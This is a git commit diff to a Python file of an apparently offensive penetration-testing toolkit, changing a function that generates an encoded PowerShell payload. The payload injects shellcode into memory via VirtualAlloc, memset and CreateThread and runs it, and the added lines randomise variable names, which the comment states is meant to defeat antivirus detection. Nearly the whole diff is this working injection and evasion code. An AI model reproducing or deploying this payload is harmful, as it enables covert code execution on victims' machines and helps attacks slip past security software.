multiple bug fixes and additions

2025-04-04 23:06:11 +00:00 · 2016-04-04 22:39:52 -04:00 · 2016-04-04 22:39:52 -04:00 · 5eae4c8a7e
commit 5eae4c8a7e
parent 3f6f420235
2 changed files with 2466 additions and 2 deletions
--- a/readme/CHANGELOG
+++ b/readme/CHANGELOG
--- a/src/core/setcore.py
+++ b/src/core/setcore.py
@ -1409,8 +1409,20 @@ def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
    # where if it detects 64 bit it'll use x86 powershell. This is useful so
    # we don't have to guess if its x64 or x86 and what type of shellcode to
    # use
-    powershell_command = (
-        r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-enc ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2 $e"}else{;iex "& powershell $2 $e";}""" % (shellcode))
+    # added random vars before and after to change strings - AV you are seriously ridiculous.
+    var1 = generate_random_string(3, 4)
+    var2 = generate_random_string(3, 4)
+    var3 = generate_random_string(3, 4)
+    var4 = generate_random_string(3, 4)
+    var5 = generate_random_string(3, 4)
+    var6 = generate_random_string(3, 4)
+
+    # one line shellcode injection with native x86 shellcode
+    powershell_code = (
+        r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-enc ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2 $e"}else{;iex "& powershell $2 $e";}""" % shellcode)
+
+    # run it through a lame var replace
+    powershell_command = powershell_code.replace("$1", "$" + var1).replace("$c", "$" + var2).replace("$2", "$" + var3).replace("$3", "$" + var4).replace("$x", "$" + var5)

    # unicode and base64 encode and return it
    return base64.b64encode(powershell_command.encode('utf_16_le')).decode("ascii")